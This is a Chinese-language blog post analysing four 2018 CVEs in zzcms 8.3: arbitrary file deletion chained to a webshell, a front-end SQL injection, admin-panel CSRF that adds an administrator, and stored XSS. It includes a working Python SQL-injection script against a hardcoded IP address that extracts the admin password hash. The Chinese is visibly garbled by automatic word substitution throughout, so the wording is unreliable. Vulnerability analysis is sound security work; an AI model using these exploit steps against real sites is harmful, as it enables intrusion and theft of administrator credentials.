zzcms 8.3 最新CVE漏洞分析

后记

虽然zzcms更新了版本,然则看到很多安然问题并没有从底层去办理,有的只是暂时性的修补了一下,这样着实是不太可取的,底层的问题存在,只要在找到别的一条可以使用的通路就一样可以使用

上次我们阐发了一下zzcms 8.2版本的一些破绽,然则很快8.3版本就推出更新了,然则在更新不久,就有新的破绽爆了出来,那就跟随大年夜师傅们的脚步进修一下有关8.2版本的阐发在我之前发的文章

zzcms 的全局过滤

首先系统也应用了伪全局变量的设置,我们找到了关键的代码:/inc/stopsqlin.php

可以看到所有的代码在默认传进来的时刻,会被addslashes转义,以是假如有单引号困绕是不存在sql注入的,然则这里也轻易呈现问题,假如是数字型没有缜密验证,或者是表名等等位置,不必要单引号闭合的位置都是很危险的,上一篇的很多的问题便是这里纰漏孕育发生的

CVE-2018-13056

简单看一下破绽阐明,又是一个随意率性文件删除破绽,我们在之前的文章总结中就说过了全部系统在文件处置惩罚上是很显着有问题的,那我们就来阐发一下此次的问题:破绽点呈现在 /user/del.php 的55行到64行

看到是从数据库中掏出的img字段,然后直接判断了是不是默认值,然后反省文件存在,着末是删除,这此中并没有涉及到文件合法性反省那我们就可以去找一下这个字段是怎么进入数据库的:

首先找到表名,是zzcms_main表,然后找一下insert或者update操作,然后我们在/user/zssave.php中发清楚明了有关操作

然后查看是否颠最后过滤,由于颠最后伪全局过滤,这里的$img并没有颠末任何有效过滤

以是向数据库中插入污点数据是很简单的,只要在宣布招商信息的时刻,抓包,改动掉落img的数据即可,这里我们测试/install/install.lock:

然后就可以到/user/del.php中去删除文件,这样就能触发删除操作然则这里有一个问题,便是删除的时刻必要知道这一笔记录在数据库中的id编号,可以采纳爆破的措施来获得

发包今后,我们刷新页面就可以发明,安装的锁文件已经被成功删除:

然后就可以共同之前的破绽,随意率性文件写入拿到webshell

CVE-2018-14961

一个前台的sql注入破绽,发明又是应用了stripfxg这个函数解除了自己的过滤,然则着实这里纵然没有引号,也是可以直接注入的,下面具体阐发一下:代码呈现问题是在:/dl/dl_sendmail.php 的 42到45行简单收拾一下逻辑便是:

以是很简单,也没有什么逻辑,可以直接注入,测试脚本如下:

#!/usr/bin/env python

#Author:Sublime

#coding:utf-8

import requests as req

url = “http://115.159.122.222:8080/dl/dl_sendmail.php”

cookies = {‘UserName’:’test’,’PassWord’:’81dc9bdb52d04dc20036dbd8313ed055′}

data = { ‘sql’:’select email from zzcms_dl where id=-1 union select pass from zzcms_admin #’}

q = req.post(url,data,cookies=cookies,allow_redirects=False)

print q.status_code

print q.content

测试结果为:

可以成功注入出治理员的密码hash

CVE-2018-14963

csrf破绽,这个问题也是从上个版本就存在的问题,便是全部治理员后台的,所有表单都是没有设置csrf的token的,以是只要涉及到敏感操作的表单,都可以应用csrf来进击,杀青很多进击使用这里的进击是孕育发生在了/admin/adminadd.php的添加治理员操作,构造的表单如下:

构造好了payload今后,放到vps上,然后引诱治理员点击恶意链接,即可成功添加治理员未添加治理员之前:

[1] [2]下一页

点击链接之后:

发明可以成功达到添加治理员的目的

CVE-2018-14962

一个存储型xss,最底层的缘故原由照样由于调用了stripfxg函数,打消了自己的过滤,然后在输出的时刻,导致了xss破绽

先看一下输出位置,在/zt/show.php 的211 行:

然后追踪这个变量的值,找到了是在用户在改动自己公司简介处添加的数据然后我们来测试一下:

保存,然后造访一下/zt/show.php?id=1,就可以看到效果:

成功触发破绽

着实感到这种破绽照样普遍存在于这个系统中的,可以顺着这个危险的函数stripfxg入手,逐个阐发,预计照样有不少漏网之鱼

上一页[1] [2]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包